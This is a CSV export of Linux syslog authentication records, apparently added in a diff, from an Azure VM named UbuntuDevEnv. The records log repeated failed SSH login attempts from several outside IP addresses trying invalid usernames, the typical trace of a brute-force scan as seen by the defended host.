+17146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:31,UbuntuDevEnv,2019-06-26 08:38:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,59446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:33,UbuntuDevEnv,2019-06-26 08:38:32,auth,UbuntuDevEnv,info,Failed password for invalid user svt from 143.0.52.117 port 60870 ssh2,59446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svt,143.0.52.1,60870,,
+17148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:33,UbuntuDevEnv,2019-06-26 08:38:32,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 60870:11: Bye Bye [preauth],59446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,60870,,
+17149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:33,UbuntuDevEnv,2019-06-26 08:38:32,auth,UbuntuDevEnv,info,Disconnected from invalid user svt 143.0.52.117 port 60870 [preauth],59446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svt,143.0.52.1,60870,,
+17150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:44,UbuntuDevEnv,2019-06-26 08:38:43,auth,UbuntuDevEnv,info,Invalid user webmin from 183.47.14.74 port 55209,59493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmin,183.47.14.7,55209,,
+17151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:44,UbuntuDevEnv,2019-06-26 08:38:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:44,UbuntuDevEnv,2019-06-26 08:38:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,59493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:45,UbuntuDevEnv,2019-06-26 08:38:45,auth,UbuntuDevEnv,info,Invalid user odilon from 185.103.243.78 port 53750,59502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odilon,185.103.243.7,53750,,
+17154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:46,UbuntuDevEnv,2019-06-26 08:38:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:46,UbuntuDevEnv,2019-06-26 08:38:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,59502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:46,UbuntuDevEnv,2019-06-26 08:38:46,auth,UbuntuDevEnv,info,Failed password for invalid user webmin from 183.47.14.74 port 55209 ssh2,59493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmin,183.47.14.7,55209,,
+17157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:46,UbuntuDevEnv,2019-06-26 08:38:46,auth,UbuntuDevEnv,info,Disconnected from invalid user webmin 183.47.14.74 port 55209 [preauth],59493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmin,183.47.14.7,55209,,
+17158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:46,UbuntuDevEnv,2019-06-26 08:38:46,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 55209:11: Bye Bye [preauth],59493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,55209,,
+17159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:48,UbuntuDevEnv,2019-06-26 08:38:47,auth,UbuntuDevEnv,info,Failed password for invalid user odilon from 185.103.243.78 port 53750 ssh2,59502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odilon,185.103.243.7,53750,,
+17160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:48,UbuntuDevEnv,2019-06-26 08:38:47,auth,UbuntuDevEnv,info,Disconnected from invalid user odilon 185.103.243.78 port 53750 [preauth],59502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odilon,185.103.243.7,53750,,
+17161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:48,UbuntuDevEnv,2019-06-26 08:38:47,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 53750:11: Bye Bye [preauth],59502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,53750,,
+17162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:41:55,UbuntuDevEnv,2019-06-26 08:41:54,auth,UbuntuDevEnv,info,Invalid user xoadmin from 143.0.52.117 port 49723,60166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xoadmin,143.0.52.1,49723,,
+17163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:41:55,UbuntuDevEnv,2019-06-26 08:41:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,60166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:41:55,UbuntuDevEnv,2019-06-26 08:41:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:41:56,UbuntuDevEnv,2019-06-26 08:41:56,auth,UbuntuDevEnv,info,Failed password for invalid user xoadmin from 143.0.52.117 port 49723 ssh2,60166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xoadmin,143.0.52.1,49723,,
+17166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:41:56,UbuntuDevEnv,2019-06-26 08:41:56,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 49723:11: Bye Bye [preauth],60166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,49723,,
+17167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:41:56,UbuntuDevEnv,2019-06-26 08:41:56,auth,UbuntuDevEnv,info,Disconnected from invalid user xoadmin 143.0.52.117 port 49723 [preauth],60166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xoadmin,143.0.52.1,49723,,
+17168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:12,UbuntuDevEnv,2019-06-26 08:42:11,auth,UbuntuDevEnv,info,Invalid user two from 185.103.243.78 port 56724,60228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,two,185.103.243.7,56724,,
+17169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:12,UbuntuDevEnv,2019-06-26 08:42:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,60228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:12,UbuntuDevEnv,2019-06-26 08:42:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:13,UbuntuDevEnv,2019-06-26 08:42:12,auth,UbuntuDevEnv,info,Invalid user veeam from 183.47.14.74 port 42876,60237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,veeam,183.47.14.7,42876,,
+17172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:13,UbuntuDevEnv,2019-06-26 08:42:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,60237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:13,UbuntuDevEnv,2019-06-26 08:42:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:14,UbuntuDevEnv,2019-06-26 08:42:14,auth,UbuntuDevEnv,info,Failed password for invalid user two from 185.103.243.78 port 56724 ssh2,60228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,two,185.103.243.7,56724,,
+17175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:14,UbuntuDevEnv,2019-06-26 08:42:14,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 56724:11: Bye Bye [preauth],60228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,56724,,
+17176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:14,UbuntuDevEnv,2019-06-26 08:42:14,auth,UbuntuDevEnv,info,Disconnected from invalid user two 185.103.243.78 port 56724 [preauth],60228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,two,185.103.243.7,56724,,
+17177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:14,UbuntuDevEnv,2019-06-26 08:42:14,auth,UbuntuDevEnv,info,Failed password for invalid user veeam from 183.47.14.74 port 42876 ssh2,60237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,veeam,183.47.14.7,42876,,
+17178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:14,UbuntuDevEnv,2019-06-26 08:42:14,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 42876:11: Bye Bye [preauth],60237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,42876,,
+17179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:42:14,UbuntuDevEnv,2019-06-26 08:42:14,auth,UbuntuDevEnv,info,Disconnected from invalid user veeam 183.47.14.74 port 42876 [preauth],60237,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,veeam,183.47.14.7,42876,,
+17180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:39,UbuntuDevEnv,2019-06-26 08:45:38,auth,UbuntuDevEnv,info,Invalid user miner from 185.103.243.78 port 59694,61055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,185.103.243.7,59694,,
+17181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:39,UbuntuDevEnv,2019-06-26 08:45:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:39,UbuntuDevEnv,2019-06-26 08:45:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,61055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:41,UbuntuDevEnv,2019-06-26 08:45:40,auth,UbuntuDevEnv,info,Failed password for invalid user miner from 185.103.243.78 port 59694 ssh2,61055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,185.103.243.7,59694,,
+17184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:41,UbuntuDevEnv,2019-06-26 08:45:40,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 59694:11: Bye Bye [preauth],61055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,59694,,
+17185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:41,UbuntuDevEnv,2019-06-26 08:45:40,auth,UbuntuDevEnv,info,Disconnected from invalid user miner 185.103.243.78 port 59694 [preauth],61055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,185.103.243.7,59694,,
+17186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:48,UbuntuDevEnv,2019-06-26 08:45:47,auth,UbuntuDevEnv,info,Invalid user lynx from 183.47.14.74 port 58772,61090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lynx,183.47.14.7,58772,,
+17187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:48,UbuntuDevEnv,2019-06-26 08:45:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:48,UbuntuDevEnv,2019-06-26 08:45:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,61090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:50,UbuntuDevEnv,2019-06-26 08:45:49,auth,UbuntuDevEnv,info,Failed password for invalid user lynx from 183.47.14.74 port 58772 ssh2,61090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lynx,183.47.14.7,58772,,
+17190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:50,UbuntuDevEnv,2019-06-26 08:45:50,auth,UbuntuDevEnv,info,Disconnected from invalid user lynx 183.47.14.74 port 58772 [preauth],61090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lynx,183.47.14.7,58772,,
+17191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:50,UbuntuDevEnv,2019-06-26 08:45:50,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 58772:11: Bye Bye [preauth],61090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,58772,,
+17192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:18,UbuntuDevEnv,2019-06-26 08:47:17,auth,UbuntuDevEnv,info,Invalid user corsa from 143.0.52.117 port 47115,61409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,corsa,143.0.52.1,47115,,
+17193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:18,UbuntuDevEnv,2019-06-26 08:47:17,auth,UbuntuDevEnv,info,Invalid user ankit from 185.103.243.78 port 47060,61404,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ankit,185.103.243.7,47060,,
+17194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:18,UbuntuDevEnv,2019-06-26 08:47:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61404,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:18,UbuntuDevEnv,2019-06-26 08:47:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,61404,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:18,UbuntuDevEnv,2019-06-26 08:47:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:18,UbuntuDevEnv,2019-06-26 08:47:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,61409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:19,UbuntuDevEnv,2019-06-26 08:47:19,auth,UbuntuDevEnv,info,Failed password for invalid user ankit from 185.103.243.78 port 47060 ssh2,61404,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ankit,185.103.243.7,47060,,
+17199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:19,UbuntuDevEnv,2019-06-26 08:47:19,auth,UbuntuDevEnv,info,Failed password for invalid user corsa from 143.0.52.117 port 47115 ssh2,61409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,corsa,143.0.52.1,47115,,
+17200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:19,UbuntuDevEnv,2019-06-26 08:47:19,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 47060:11: Bye Bye [preauth],61404,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,47060,,
+17201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:19,UbuntuDevEnv,2019-06-26 08:47:19,auth,UbuntuDevEnv,info,Disconnected from invalid user ankit 185.103.243.78 port 47060 [preauth],61404,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ankit,185.103.243.7,47060,,
+17202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:20,UbuntuDevEnv,2019-06-26 08:47:19,auth,UbuntuDevEnv,info,Disconnected from invalid user corsa 143.0.52.117 port 47115 [preauth],61409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,corsa,143.0.52.1,47115,,
+17203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:20,UbuntuDevEnv,2019-06-26 08:47:19,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 47115:11: Bye Bye [preauth],61409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,47115,,
+17204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:36,UbuntuDevEnv,2019-06-26 08:47:36,auth,UbuntuDevEnv,info,Invalid user gmmisdt from 183.47.14.74 port 38487,61473,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmmisdt,183.47.14.7,38487,,
+17205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:36,UbuntuDevEnv,2019-06-26 08:47:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61473,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
